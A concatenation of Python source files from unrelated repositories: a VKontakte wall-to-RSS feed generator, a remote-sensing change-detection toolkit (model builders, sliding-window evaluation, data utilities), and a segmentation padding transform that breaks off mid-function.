text_title = ( self.request.get('text_title', '0') != '0' )
big_photos = ( self.request.get('big_photos', '0') != '0' )
LOG.info('Requested feed for "%s" (foreign_posts = %s, show_photo = %s, hash_tag_title = %s, text_title = %s, big_photos = %s).',
profile_name, foreign_posts, show_photo, hash_tag_title, text_title, big_photos)
use_api = True
if_modified_since = None
if use_api:
# Use VKontakte API
from vkfeed.tools import wall_reader
max_posts_num = 50
cur_time = int(time.time())
latency = constants.MINUTE_SECONDS
min_timestamp = cur_time - constants.WEEK_SECONDS
## This confuses Google Reader users because it always requests
## feeds with 'Cache-Control: max-age=3600' when adding
## subscriptions and users often gen an empty feed.
#for cache_control in headers.get('cache-control', '').split(','):
# cache_control = cache_control.strip()
# if cache_control.startswith('max-age='):
# LOG.info('Applying Cache-Control: %s...', cache_control)
# try:
# cache_max_age = int(cache_control[len('max-age='):])
# except ValueError:
# LOG.error('Invalid header: Cache-Control = %s.', cache_control)
# else:
# if cache_max_age:
# min_timestamp = max(min_timestamp, cur_time - cache_max_age - latency)
if 'if-modified-since' in headers and headers['if-modified-since'] != '0':
LOG.info('Applying If-Modified-Since: %s...', headers['if-modified-since'])
try:
if_modified_since = vkfeed.utils.http_timestamp(headers['if-modified-since'])
except Exception as e:
LOG.error('Invalid header: If-Modified-Since = %s.', headers['if-modified-since'])
else:
min_timestamp = max(min_timestamp, if_modified_since - latency)
max_age = cur_time - min_timestamp
LOG.info('Applying the following limits: max_age=%s, max_posts_num=%s', max_age, max_posts_num)
try:
data = wall_reader.read(profile_name,
min_timestamp, max_posts_num, foreign_posts, show_photo,
hash_tag_title, text_title, big_photos)
except wall_reader.ConnectionError as e:
http_status = httplib.BAD_GATEWAY
user_error = 'Ошибка соединения с сервером <a href="{0}" target="_blank">{0}</a>.'.format(constants.API_URL)
raise
except wall_reader.ServerError as e:
http_status = httplib.NOT_FOUND
user_error = unicode(e)
raise
else:
# Parse HTML from site
from vkfeed.tools.wall_parser import WallPageParser, ParseError, PrivateGroupError, ProfileNotAvailableError, ServerError
url = constants.VK_URL + cgi.escape(profile_name)
url_html = '<a href="{0}" target="_blank">{0}</a>'.format(url)
if profile_name == 'feed':
http_status = httplib.NOT_FOUND
user_error = 'Страница {0} не является профилем пользователя или группы.'.format(url_html)
raise Error('Unsupported page.')
try:
profile_page = vkfeed.utils.fetch_url(url)
except vkfeed.utils.HTTPNotFoundError:
http_status = httplib.NOT_FOUND
user_error = 'Пользователя или группы {0} не существует.'.format(url_html)
raise
except Error:
http_status = httplib.BAD_GATEWAY
user_error = 'Не удалось загрузить страницу {0}.'.format(url_html)
unknown_user_error = True
raise
try:
data = WallPageParser().parse(profile_page)
except PrivateGroupError as e:
http_status = httplib.NOT_FOUND
user_error = 'Группа {0} является закрытой группой.'.format(url_html)
raise
except ProfileNotAvailableError as e:
http_status = httplib.NOT_FOUND
user_error = 'Страница пользователя {0} удалена или доступна только авторизованным пользователям.'.format(url_html)
raise
except ServerError as e:
LOG.debug('Page contents:\n%s', profile_page)
http_status = httplib.BAD_GATEWAY
user_error = 'Сервер {0} вернул ошибку{1}'.format(url_html, ':<br />' + e.server_error if e.server_error else '.')
unknown_user_error = True
raise
except ParseError as e:
LOG.debug('Page contents:\n%s', profile_page)
http_status = httplib.NOT_FOUND
user_error = 'Сервер вернул страницу, на которой не удалось найти стену с сообщениями пользователя.'
unknown_user_error = True
raise
data['url'] = url
if 'user_photo' not in data:
data['user_photo'] = constants.APP_URL + 'images/vk-rss-logo.png'
LOG.info('Return %s items.', len(data['posts']))
if if_modified_since is not None and not data['posts']:
http_status = httplib.NOT_MODIFIED
else:
feed = self.__generate_feed(data)
except Exception as e:
if isinstance(e, Error):
if user_error and not unknown_user_error:
log_function = LOG.warning
else:
log_function = LOG.error
else:
log_function = LOG.exception
log_function('Unable to generate a feed for "%s": %s', profile_name, e)
if user_error:
self.error(http_status)
error = '<p>Ошибка при генерации RSS-ленты:</p><p>{0}</p>'.format(user_error)
if unknown_user_error:
error += '''<p>
Пожалуйста, убедитесь, что вы правильно указали профиль
пользователя или группы, и что данный профиль является
общедоступным.
</p>'''
else:
self.error(httplib.INTERNAL_SERVER_ERROR)
error = '''При генерации RSS-ленты произошла внутренняя ошибка сервера.'''
self.response.headers[b'Content-Type'] = b'text/html; charset=utf-8'
self.response.out.write(vkfeed.utils.render_template('error.html', { 'error': error }))
else:
if http_status == httplib.OK:
self.response.headers[b'Content-Type'] = b'application/rss+xml'
self.response.out.write(feed)
else:
self.error(http_status)
def __generate_feed(self, data):
'''Generates a feed from a parsed data.'''
rss = PyRSS2Gen.RSS2(
title = data['user_name'],
link = data['url'],
description = 'Сообщения со стены пользователя ' + data['user_name'],
image = PyRSS2Gen.Image(
url = data['user_photo'],
title = data['user_name'],
link = data['url'],
description = 'Сообщения со стены пользователя ' + data['user_name']
),
items = [
PyRSS2Gen.RSSItem(
title = post['title'],
link = post['url'],
description = post['text'],
guid = PyRSS2Gen.Guid(post['url']),
pubDate = post.get('date', datetime.datetime.utcnow())
) for post in data['posts']
]
)
return rss.to_xml('utf-8')
def __get_headers(self):
'''Returns lowercased headers.'''
return { name.lower(): value for name, value in self.request.headers.iteritems() }
```
#### File: vkfeed/tools/wall_reader.py
```python
from __future__ import unicode_literals
import json
import datetime
import logging
import re
import urllib
from google.appengine.api import memcache
import vkfeed.utils
from vkfeed import constants
from vkfeed.core import Error
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
_TEXT_URL_RE = re.compile(r'(^|\s|>)(https?://[^"]+?)(\.?(?:<|\s|$))')
'''Matches a URL in a plain text.'''
_DOMAIN_ONLY_TEXT_URL_RE = re.compile(r'(^|\s|>)((?:[a-z0-9](?:[-a-z0-9]*[a-z0-9])?\.)+[a-z0-9](?:[-a-z0-9]*[a-z0-9])/[^"]+?)(\.?(?:<|\s|$))')
'''Matches a URL without protocol specification in a plain text.'''
_NEW_LINE_RE = re.compile(r'<br(?:\s*/)?>', re.IGNORECASE)
'''Matches an HTML line break (<br>) in a post text.'''
_USER_LINK_RE = re.compile(r'\[((?:id|club)\d+)\|([^\]]+)\]')
'''Matches a user link in a post text.'''
_GROUP_ALIAS_RE = re.compile(r'^(?:event|public)(\d+)$')
'''Matches group ID aliases.'''
_HASH_TAG_RE = re.compile(ur'#[a-zA-Zа-яА-Я0-9\-_]+')
'''Matches a hash tag.'''
class ConnectionError(Error):
'''Raised when we fail to get a data from the server.'''
def __init__(self, *args, **kwargs):
Error.__init__(self, *args, **kwargs)
class ServerError(Error):
'''Raised when the server reports an error.'''
def __init__(self, code, *args, **kwargs):
Error.__init__(self, *args, **kwargs)
self.code = code
def read(profile_name, min_timestamp, max_posts_num, foreign_posts, show_photo, hash_tag_title, text_title, big_photos):
'''Reads a wall of the specified user.'''
users = {}
wall_posts = []
user = _get_user(profile_name)
def get_wall(prediction):
LOG.info('Predicted to %s.', prediction)
_get_wall(user, foreign_posts, len(wall_posts), prediction - len(wall_posts), users, wall_posts)
if len(wall_posts) < max_posts_num and len(wall_posts) == prediction and wall_posts[-1]['date'] > min_timestamp:
LOG.warning('Got invalid prediction %s.', prediction)
get_wall(min(max(prediction, 5) * 2, max_posts_num))
wall_request_fingerprint = '{0}|{1}|{2}'.format(user['id'], int(foreign_posts), max_posts_num)
last_post_num = memcache.get(wall_request_fingerprint, 'post_stat')
if last_post_num is None:
LOG.info('There is no statistics on previous number of posts.')
get_wall(10 if max_posts_num > 10 else max_posts_num)
else:
LOG.info('Previously returned number of posts: %s.', last_post_num)
get_wall(min(max_posts_num, last_post_num + 2))
wall_posts = wall_posts[:max_posts_num]
img_style = 'style="border-style: none; display: block;"'
posts = []
for post in wall_posts:
if post['date'] < min_timestamp:
continue
supported = []
unsupported = []
title = _get_post_title(users, post, text_title, hash_tag_title)
if 'attachment' in post and post['text'] == post['attachment'][post['attachment']['type']].get('title'):
post['text'] = ''
photo_count = reduce(
lambda count, attachment:
count + ( attachment['type'] in ( 'photo', 'posted_photo' ) ),
post.get('attachments', []), 0)
for attachment in post.get('attachments', []):
# Notice: attachment object is not always stored in
# attachment[attachment["type"]] - sometimes it's stored under a
# different key, so we can't obtain it here for all attachment types.
if attachment['type'] == 'app':
supported.append(
'<a href="{vk_url}app{info[app_id]}"><img {img_style} src="{info[src]}" /></a>'.format(
vk_url = constants.VK_URL, info = attachment[attachment['type']], img_style = img_style))
elif attachment['type'] == 'graffiti':
supported.append(
'<a href="{vk_url}graffiti{info[gid]}"><img {img_style} src="{info[src]}" /></a>'.format(
vk_url = constants.VK_URL, info = attachment[attachment['type']], img_style = img_style))
elif attachment['type'] == 'link':
info = attachment[attachment['type']]
info['description'] = _parse_text(info['description']) or info['title']
html = '<b>Ссылка: <a href="{info[url]}">{info[title]}</a></b><p>'.format(info = info)
if info.get('image_src') and info['description']:
html += (
'<table cellpadding="0" cellspacing="0"><tr valign="top">'
'<td><a href="{info[url]}"><img {img_style} src="{info[image_src]}" /></a></td>'
'<td style="padding-left: 10px;">{info[description]}</td>'
'</tr></table>'.format(info = info, img_style = img_style))
elif info.get('image_src'):
html += '<a href="{info[url]}"><img {img_style} src="{info[image_src]}" /></a>'.format(
info = info, img_style = img_style)
elif info['description']:
html += info['description']
html += '</p>'
supported.append(html)
elif attachment['type'] in ('photo', 'posted_photo'):
info = attachment[attachment['type']]
photo_id = info.get('pid', info.get('id', 0))
photo_src = info['src_big'] if photo_count == 1 or big_photos else info['src']
# Photo may have id = 0 and owner_id = 0 if it for example
# generated by an application.
if photo_id == 0 or info['owner_id'] == 0:
supported.append(
'<a href="{vk_url}wall{profile_id}_{post_id}"><img {img_style} src="{photo_src}" /></a>'.format(
vk_url = constants.VK_URL, profile_id = user['id'], post_id = post['id'],
img_style = img_style, photo_src = photo_src))
else:
supported.append(
'<a href="{vk_url}wall{profile_id}_{post_id}?z=photo{info[owner_id]}_{photo_id}%2Fwall{profile_id}_{post_id}">'
'<img {img_style} src="{photo_src}" /></a>'.format(
vk_url = constants.VK_URL, profile_id = user['id'], photo_id = photo_id,
info = info, post_id = post['id'], img_style = img_style, photo_src = photo_src))
elif attachment['type'] == 'video':
info = attachment[attachment['type']]
supported.append(
'<a href="{vk_url}wall{profile_id}_{post_id}?z=video{info[owner_id]}_{info[vid]}">'
'<img {img_style} src="{info[image]}" />'
'<b>{info[title]} ({duration})</b>'
'</a>'.format(
vk_url = constants.VK_URL, profile_id = user['id'], post_id = post['id'], info = info,
img_style = img_style, duration = _get_duration(info['duration'])))
elif attachment['type'] == 'audio':
info = attachment[attachment['type']]
unsupported.append('<b>Аудиозапись: <a href="{vk_url}search?{query}">{title}</a></b>'.format(
vk_url = constants.VK_URL, query = urllib.urlencode({
'c[q]': (info['performer'] + ' - ' + info['title']).encode('utf-8'),
'c[section]': 'audio'
}), title = '{} - {} ({})'.format(info['performer'], info['title'], _get_duration(info['duration']))))
elif attachment['type'] == 'doc':
unsupported.append('<b>Документ: {}</b>'.format(attachment[attachment['type']]['title']))
elif attachment['type'] == 'note':
unsupported.append('<b>Заметка: {}</b>'.format(attachment[attachment['type']]['title']))
elif attachment['type'] == 'page':
unsupported.append('<b>Страница: {}</b>'.format(attachment[attachment['type']]['title']))
elif attachment['type'] == 'poll':
unsupported.append('<b>Опрос: {}</b>'.format(attachment[attachment['type']]['question']))
text = ''
if supported:
text += '<p>' + '</p><p>'.join(supported) + '</p>'
text += _parse_text(post['text'])
if unsupported:
text += '<p>' + '</p><p>'.join(unsupported) + '</p>'
if 'copy_owner_id' in post and 'copy_post_id' in post:
text = '<p><b><a href="{profile_url}">{user_name}</a></b> пишет:</p>'.format(
profile_url = _get_profile_url(post['copy_owner_id']), user_name = users[post['copy_owner_id']]['name']) + text
if 'copy_text' in post:
text = '<p>{}</p><div style="margin-left: 1em;">{}</div>'.format(post['copy_text'], text)
if 'reply_owner_id' in post and 'reply_post_id' in post:
text += (
'<p><i>'
'В ответ на <a href="{vk_url}wall{post[reply_owner_id]}_{post[reply_post_id]}">запись</a> '
'пользователя <b><a href="{profile_url}">{user_name}</a></b>.'
'</i></p>'.format(vk_url = constants.VK_URL, post = post,
profile_url = _get_profile_url(post['reply_owner_id']), user_name = users[post['reply_owner_id']]['name']))
if show_photo:
text = (
'<table cellpadding="0" cellspacing="0"><tr valign="top">'
'<td><a href="{url}"><img {img_style} src="{photo}" /></a></td>'
'<td style="padding-left: 10px;">{text}</td>'
'</tr></table>'.format(
url = _get_profile_url(post['from_id']), img_style = img_style,
photo = users[post['from_id']]['photo'], text = text))
date = (
datetime.datetime.fromtimestamp(post['date'])
# Take MSK timezone into account
+ datetime.timedelta(hours = 4))
posts.append({
'title': title,
'url': '{0}wall{1}_{2}'.format(constants.VK_URL, user['id'], post['id']),
'text': text,
'date': date,
})
if last_post_num != len(posts):
memcache.set(wall_request_fingerprint, len(posts), namespace = 'post_stat')
return {
'url': constants.VK_URL + profile_name,
'user_name': user['name'],
'user_photo': user['photo'],
'posts': posts,
}
def _api(method, **kwargs):
'''Calls the specified VKontakte API method.'''
url = '{0}method/{1}?language=0&'.format(constants.API_URL, method) + urllib.urlencode(kwargs)
try:
data = vkfeed.utils.fetch_url(url, content_type = 'application/json')
try:
data = json.loads(data)
except Exception as e:
raise Error('Failed to parse JSON data: {0}.', e)
except Exception as e:
raise ConnectionError('API call {0} failed: {1}', url, e)
if 'error' in data or 'response' not in data:
error = data.get('error', {}).get('error_msg', '').strip()
if not error:
error = 'Ошибка вызова API.'
elif error == 'Access denied: group is blocked':
error = (
'Страница временно заблокирована и проверяется администраторами, '
'так как некоторые пользователи считают, что она не соответствует правилам сайта.')
elif error == 'Access denied: this wall available only for community members':
error = 'Это частное сообщество. Доступ только по приглашениям администраторов.'
elif error == 'User was deleted or banned':
error = 'Пользователь удален или забанен.'
elif not error.endswith('.'):
error += '.'
raise ServerError(data.get('error', {}).get('error_code'), error)
return data['response']
def _get_duration(seconds):
'''Returns audio/video duration string.'''
hours = seconds / 60 / 60
minutes = seconds / 60 % 60
seconds = seconds % 60
if hours:
return '{:02d}:{:02d}:{:02d}'.format(hours, minutes, seconds)
else:
return '{:02d}:{:02d}'.format(minutes, seconds)
def _get_post_title(users, post, text_title, hash_tag_title):
'''Formats title for a post.'''
title = users[post['from_id']]['name']
if text_title:
text = post['text'].lstrip('.?!')
text = _NEW_LINE_RE.sub(' ', text).strip()
if text:
title = _USER_LINK_RE.sub(r'\2', text)
limit_pos = len(title)
pos = title.find('.')
if pos != -1:
limit_pos = min(limit_pos, pos)
if title[limit_pos : limit_pos + 3] == '...':
limit_pos += 3
pos = title.find('?')
if pos != -1:
limit_pos = min(limit_pos, pos + 1)
pos = title.find('!')
if pos != -1:
limit_pos = min(limit_pos, pos + 1)
title = title[:limit_pos]
elif hash_tag_title:
hash_tags = _HASH_TAG_RE.findall(post['text'])
if hash_tags:
title = ', '.join(
tag[1:].lower() if id else tag[1:].title()
for id, tag in enumerate(hash_tags))
return title
def _get_profile_url(profile_id):
'''Returns URL to profile with the specified ID.'''
return constants.VK_URL + ( 'club' if profile_id < 0 else 'id' ) + str(abs(profile_id))
def _get_user(profile_name):
'''Returns user info by profile name.'''
user = memcache.get(profile_name, 'users')
if user is not None:
LOG.info('Got the profile info from memcache.')
if not user:
raise ServerError(113, 'Пользователя не существует.')
return user
try:
profiles = _api('users.get', uids = profile_name, fields = 'photo_big,photo_medium,photo')
if not profiles:
raise ServerError(-1, 'Пользователь заблокирован.')
profile = profiles[0]
user = {
'id': profile['uid'],
'name': profile['first_name'] + ' ' + profile['last_name'],
}
except ServerError as e:
# Invalid user ID
if e.code == 113:
try:
# VKontakte API doesn't understand group ID aliases
match = _GROUP_ALIAS_RE.match(profile_name)
if match is not None:
profile_name = 'club' + match.group(1)
profiles = _api('groups.getById', gid = profile_name, fields = 'photo_big,photo_medium,photo')
if not profiles:
raise ServerError(-1, 'Сообщество заблокировано.')
profile = profiles[0]
user = {
'id': -profile['gid'],
'name': profile['name'],
}
except ServerError as e:
# Invalid group ID
if e.code in (100, 125):
memcache.set(profile_name, {}, namespace = 'users', time = constants.HOUR_SECONDS)
raise ServerError(113, 'Пользователя не существует.')
else:
raise e
else:
raise e
if 'photo_big' in profile:
user['photo'] = profile['photo_big']
elif 'photo_medium' in profile:
user['photo'] = profile['photo_medium']
else:
user['photo'] = profile['photo']
memcache.set(profile_name, user, namespace = 'users', time = constants.DAY_SECONDS)
return user
def _get_wall(user, foreign_posts, offset, max_posts_num, users, posts):
'''Returns wall posts of the specified user.'''
reply = _api(
'wall.get', owner_id = user['id'], offset = offset, count = max_posts_num,
filter = 'all' if foreign_posts else 'owner', extended = 1)
posts.extend(reply['wall'][1:])
for profile in reply.get('profiles', []):
users[profile['uid']] = {
'name': profile['first_name'] + ' ' + profile['last_name'],
'photo': profile['photo'],
}
for profile in reply.get('groups', []):
users[-profile['gid']] = {
'name': profile['name'],
'photo': profile['photo'],
}
def _parse_text(text):
'''Parses a post text.'''
text = _TEXT_URL_RE.sub(r'\1<a href="\2">\2</a>\3', text)
text = _DOMAIN_ONLY_TEXT_URL_RE.sub(r'\1<a href="http://\2">\2</a>\3', text)
text = _USER_LINK_RE.sub(r'<b><a href="{}\1">\2</a></b>'.format(constants.VK_URL), text)
return text
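# --- Editor's illustrative examples (not part of the original module) ---
# _get_duration(3725) -> '01:02:05' (relies on Python 2 integer division, as does the
# rest of this module); _parse_text wraps bare URLs in <a> tags and expands
# [id123|Name] mentions into profile links rooted at constants.VK_URL.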
``` |
{
"source": "Jokerming-MJ/CDLab",
"score": 2
} |
#### File: impl/builders/model_builders.py
```python
from core.misc import MODELS
@MODELS.register_func('UNet_model')
def build_unet_model(C):
from models.unet import UNet
return UNet(6, 2)
@MODELS.register_func('UNet_OSCD_model')
def build_unet_oscd_model(C):
from models.unet import UNet
return UNet(26, 2)
@MODELS.register_func('SiamUNet-diff_model')
def build_siamunet_diff_model(C):
from models.siamunet_diff import SiamUNet_diff
return SiamUNet_diff(3, 2)
@MODELS.register_func('SiamUNet-diff_OSCD_model')
def build_siamunet_diff_oscd_model(C):
from models.siamunet_diff import SiamUNet_diff
return SiamUNet_diff(13, 2)
@MODELS.register_func('SiamUNet-conc_model')
def build_siamunet_conc_model(C):
from models.siamunet_conc import SiamUNet_conc
return SiamUNet_conc(3, 2)
@MODELS.register_func('SiamUNet-conc_OSCD_model')
def build_siamunet_conc_oscd_model(C):
from models.siamunet_conc import SiamUNet_conc
return SiamUNet_conc(13, 2)
@MODELS.register_func('CDNet_model')
def build_cdnet_model(C):
from models.cdnet import CDNet
return CDNet(6, 2)
@MODELS.register_func('IFN_model')
def build_ifn_model(C):
from models.ifn import DSIFN
return DSIFN()
@MODELS.register_func('SNUNet_model')
def build_snunet_model(C):
from models.snunet import SNUNet
return SNUNet(3, 2, 32)
@MODELS.register_func('STANet_model')
def build_stanet_model(C):
from models.stanet import STANet
return STANet(**C['stanet_model'])
@MODELS.register_func('LUNet_model')
def build_lunet_model(C):
from models.lunet import LUNet
return LUNet(3, 2)
@MODELS.register_func('P2V_model')
def build_p2v_model(C):
from models.p2v import P2VNet
return P2VNet(**C['p2v_model'])
@MODELS.register_func('DSAMNet_model')
def build_dsamnet_model(C):
from models.dsamnet import DSAMNet
return DSAMNet(**C['dsamnet_model'])
@MODELS.register_func('BIT_model')
def build_bit_model(C):
from models.bit import BIT
return BIT(**C['bit_model'])
@MODELS.register_func('CDP_model')
def build_cdp_model(C):
try:
import change_detection_pytorch as cdp
except ModuleNotFoundError:
raise ModuleNotFoundError("The change_detection.pytorch library is not available!")
cdp_model_cfg = C['cdp_model'].copy()
arch = cdp_model_cfg.pop('arch')
encoder_name = cdp_model_cfg.pop('encoder_name')
encoder_weights = cdp_model_cfg.pop('encoder_weights')
in_channels = cdp_model_cfg.pop('in_channels')
classes = cdp_model_cfg.pop('classes')
model = cdp.create_model(
arch=arch,
encoder_name=encoder_name,
encoder_weights=encoder_weights,
in_channels=in_channels,
classes=classes,
**cdp_model_cfg
)
return model
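# --- Editor's note (assumption, not from this file) ---
# Each builder is registered under a name such as 'BIT_model' and receives the parsed
# config dict C; presumably core.factories.model_factory (used in src/sw_test.py below)
# looks C['model'] up in this MODELS registry and calls the matching builder, with
# per-model kwargs living under keys such as C['bit_model'].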
```
#### File: CDLab/src/sw_test.py
```python
import argparse
import os.path as osp
from glob import iglob
import torch
import numpy as np
from skimage.io import imread, imsave
import core
import impl.builders
import impl.trainers
from core.misc import R
from core.config import parse_args
from core.factories import model_factory
from utils.metrics import Precision, Recall, F1Score, Accuracy
from utils.data_utils.preprocessors import Normalize
from utils.data_utils.misc import to_tensor, to_array, quantize_8bit
class WindowGenerator:
def __init__(self, h, w, ch, cw, si=1, sj=1):
self.h = h
self.w = w
self.ch = ch
self.cw = cw
if self.h < self.ch or self.w < self.cw:
raise NotImplementedError
self.si = si
self.sj = sj
self._i, self._j = 0, 0
def __next__(self):
# Column-first movement
if self._i > self.h:
raise StopIteration
bottom = min(self._i+self.ch, self.h)
right = min(self._j+self.cw, self.w)
top = max(0, bottom-self.ch)
left = max(0, right-self.cw)
if self._j >= self.w-self.cw:
if self._i >= self.h-self.ch:
# Set an illegal value to enable early stopping
self._i = self.h+1
self._goto_next_row()
else:
self._j += self.sj
if self._j > self.w:
self._goto_next_row()
return slice(top, bottom, 1), slice(left, right, 1)
def __iter__(self):
return self
def _goto_next_row(self):
self._i += self.si
self._j = 0
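# Editor's note: WindowGenerator yields (row_slice, col_slice) pairs that tile an
# h x w image with ch x cw windows at strides (si, sj); for example,
# list(WindowGenerator(4, 4, 2, 2, 2, 2)) produces the four non-overlapping 2x2 corners.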
class Preprocessor:
def __init__(self, mu, sigma, device):
self.norm = Normalize(np.asarray(mu), np.asarray(sigma))
self.device = device
def __call__(self, im):
im = self.norm(im)
im = to_tensor(im).unsqueeze(0).float()
im = im.to(self.device)
return im
class PostProcessor:
def __init__(self, out_type, out_key=0):
self.out_type = out_type
self.out_key = out_key
def __call__(self, pred):
if not isinstance(pred, torch.Tensor):
pred = pred[self.out_key]
if self.out_type == 'logits':
return to_array(torch.nn.functional.sigmoid(pred)[0,0])
elif self.out_type == 'logits2':
return to_array(torch.nn.functional.softmax(pred, dim=1)[0,1])
elif self.out_type == 'dist':
return to_array(pred.squeeze(1))
else:
raise ValueError
def sw_infer(t1, t2, model, window_size, stride, prep, postp):
h, w = t1.shape[:2]
win_gen = WindowGenerator(h, w, window_size, window_size, stride, stride)
prob_map = np.zeros((h,w), dtype=np.float64) # np.float was removed in recent NumPy; use an explicit dtype
cnt = np.zeros((h,w), dtype=np.float64)
with torch.no_grad():
for rows, cols in win_gen:
patch1, patch2 = t1[rows, cols], t2[rows, cols]
patch1, patch2 = prep(patch1), prep(patch2)
pred = model(patch1, patch2)
prob = postp(pred)
prob_map[rows,cols] += prob
cnt[rows,cols] += 1
prob_map /= cnt
return prob_map
def prepare_model(args):
model = model_factory(args['model'], args)
ckp_dict = torch.load(args['ckp_path'])
model.load_state_dict(ckp_dict['state_dict'])
model.to(args['device'])
model.eval()
return model
def main():
# Parse commandline arguments
def parser_configurator(parser):
# HACK: replace the original parser by a new one
parser = argparse.ArgumentParser(conflict_handler='resolve')
parser.add_argument('--exp_config', type=str, default='')
parser.add_argument('--inherit_off', action='store_true')
parser.add_argument('--ckp_path', type=str)
parser.add_argument('--device', type=str, default='cpu')
parser.add_argument('--t1_dir', type=str, default='')
parser.add_argument('--t2_dir', type=str, default='')
parser.add_argument('--out_dir', type=str, default='')
parser.add_argument('--gt_dir', type=str, default='')
parser.add_argument('--window_size', type=int, default=256)
parser.add_argument('--stride', type=int, default=256)
parser.add_argument('--save_on', action='store_true')
parser.add_argument('--mu', type=float, nargs='+', default=(0.0,0.0,0.0))
parser.add_argument('--sigma', type=float, nargs='+', default=(255.0,255.0,255.0))
parser.add_argument('--glob', type=str, default='*.png')
parser.add_argument('--threshold', type=float, default=0.5)
parser.add_argument('--out_type', type=str, choices=['logits', 'logits2', 'dist'], default='logits')
return parser
args = parse_args(parser_configurator)
logger = R['Logger']
model = prepare_model(args)
prep = Preprocessor(args['mu'], args['sigma'], args['device'])
postp = PostProcessor(args['out_type'])
prec, rec, f1, acc = Precision(mode='accum'), Recall(mode='accum'), F1Score(mode='accum'), Accuracy(mode='accum')
try:
for i, path in enumerate(iglob(osp.join(args['gt_dir'], args['glob']))):
basename = osp.basename(path)
gt = (imread(path)>0).astype('uint8')
t1 = imread(osp.join(args['t1_dir'], basename))
t2 = imread(osp.join(args['t2_dir'], basename))
prob_map = sw_infer(t1, t2, model, args['window_size'], args['stride'], prep, postp)
cm = (prob_map>args['threshold']).astype('uint8') # matches the --threshold CLI flag
prec.update(cm, gt)
rec.update(cm, gt)
f1.update(cm, gt)
acc.update(cm, gt)
logger.show("{:>4} Precision: {:.4f} Recall: {:.4f} F1: {:.4f} OA: {:.4f}".format(
i, prec.val, rec.val, f1.val, acc.val
))
if args['save_on']:
imsave(osp.join(args['out_dir'], basename), quantize_8bit(cm))
except BaseException as e:
import traceback
import sys
import pdb
logger.fatal(traceback.format_exc())
pdb.post_mortem(sys.exc_info()[2])
exit(1)
if __name__ == '__main__':
main()
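# --- Editor's illustrative invocation (paths and file names are assumptions) ---
# python src/sw_test.py --exp_config configs/my_exp.yaml --ckp_path checkpoints/model_best.pth \
#     --t1_dir data/t1 --t2_dir data/t2 --gt_dir data/gt --out_dir out \
#     --window_size 256 --stride 128 --threshold 0.5 --save_on --device cuda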
```
#### File: utils/data_utils/misc.py
```python
import torch
import numpy as np
import cv2
from scipy.io import loadmat
from skimage.io import imread
from imageio import mimsave
def default_loader(path_):
return imread(path_)
def mat_loader(path_):
return loadmat(path_)
def save_gif(uri, img_seq):
mimsave(uri, img_seq)
def to_tensor(arr):
if any(s < 0 for s in arr.strides):
arr = np.ascontiguousarray(arr)
if arr.ndim < 3:
return torch.from_numpy(arr)
elif arr.ndim == 3:
return torch.from_numpy(np.transpose(arr, (2,0,1)))
else:
raise ValueError
def to_array(tensor):
if tensor.ndim <= 4:
arr = tensor.data.cpu().numpy()
if tensor.ndim in (3, 4):
arr = np.moveaxis(arr, -3, -1)
return arr
else:
raise ValueError
def normalize_minmax(x):
EPS = 1e-32
return (x-x.min()) / (x.max()-x.min()+EPS)
def normalize_8bit(x):
return x/255.0
def to_pseudo_color(gray, color_map=cv2.COLORMAP_JET):
# Reverse channels to convert BGR to RGB
return cv2.applyColorMap(gray, color_map)[...,::-1]
def quantize_8bit(x):
# [0.0,1.0] float => [0,255] uint8
# or [0,1] int => [0,255] uint8
return (x*255).astype('uint8')
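# --- Editor's illustrative check (not part of the original file) ---
if __name__ == '__main__':
    img = np.zeros((4, 4, 3), dtype=np.float32)
    t = to_tensor(img)                        # (H, W, C) -> (C, H, W) torch.Tensor
    assert tuple(t.shape) == (3, 4, 4)
    assert to_array(t).shape == (4, 4, 3)     # back to a channels-last numpy array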
``` |
{
"source": "Jokerming-MJ/cutmix-semisup-seg",
"score": 3
} |
#### File: cutmix-semisup-seg/datapipe/seg_transforms_cv.py
```python
import math
import cv2
import numpy as np
from skimage import img_as_float
from datapipe import affine
from datapipe.seg_transforms import SegTransform
# PyTorch data loaders use multi-processing.
# OpenCV uses threads that are not replicated when the process is forked,
# causing OpenCV functions to lock up, so we have to tell OpenCV not to use threads
cv2.setNumThreads(0)
class SegCVTransformPad (SegTransform):
def pad_single(self, sample, min_size):
sample = sample.copy()
image = sample['image_arr']
# image, labels, mask, xf = seg_img.image, seg_img.labels, seg_img.mask, seg_img.xf
img_size = image.shape[:2]
if img_size[0] < min_size[0] or img_size[1] < min_size[1]:
# Padding required
# Compute padding
pad_h = max(min_size[0] - img_size[0], 0)
pad_w = max(min_size[1] - img_size[1], 0)
h0 = pad_h // 2
h1 = pad_h - h0
w0 = pad_w // 2
w1 = pad_w - w0
# Add an alpha channel to the image so that we can use it during standardisation
# to ensure that the padding area has a value of 0, post mean-subtraction
alpha_channel = np.ones(img_size + (1,), dtype=image.dtype) * 255
image = np.append(image[:, :, :3], alpha_channel, axis=2)
# Apply
sample['image_arr'] = np.pad(image, [[h0, h1], [w0, w1], [0, 0]], mode='constant', constant_values=0)
if 'labels_arr' in sample:
sample['labels_arr'] = np.pad(sample['labels_arr'], [[h0, h1], [w0, w1]], mode='constant', constant_values=255)
if 'mask_arr' in sample:
sample['mask_arr'] = np.pad(sample['mask_arr'], [[h0, h1], [w0, w1]], mode='constant')
if 'xf_cv' in sample:
sample['xf_cv'] = affine.cat_nx2x3(
affine.translation_matrices(np.array([[w0, h0]])),
sample['xf_cv'][None, ...]
)[0]
return sample
def pad_pair(self, sample0, sample1, min_size):
sample0 = sample0.copy()
sample1 = sample1.copy()
image0 = sample0['image_arr']
image1 = sample1['image_arr']
img_size0 = image0.shape[:2]
if img_size0[0] < min_size[0] or img_size0[1] < min_size[1]:
# Padding required
# Compute padding
pad_h = max(min_size[0] - img_size0[0], 0)
pad_w = max(min_size[1] - img_size0[1], 0)
h0 = pad_h // 2
h1 = pad_h - h0
w0 = pad_w // 2
w1 = pad_w - w0
# Add an alpha channel to the image so that we can use it during standardisation
# to ensure that the padding area has a value of 0, post mean-subtraction
alpha_channel = np.ones(img_size0 + (1,), dtype=image0.dtype) * 255
image0 = np.append(image0[:, :, :3], alpha_channel, axis=2)
image1 = np.append(image1[:, :, :3], alpha_channel, axis=2)
# Apply
sample0['image_arr'] = np.pad(image0, [[h0, h1], [w0, w1], [0, 0]], mode='constant', constant_values=0)
sample1['image_arr'] = np.pad(image1, [[h0, h1], [w0, w1], [0, 0]], mode='constant', constant_values=0)
if 'labels_arr' in sample0:
sample0['labels_arr'] = np.pad(sample0['labels_arr'], [[h0, h1], [w0, w1]], mode='constant', constant_values=255)
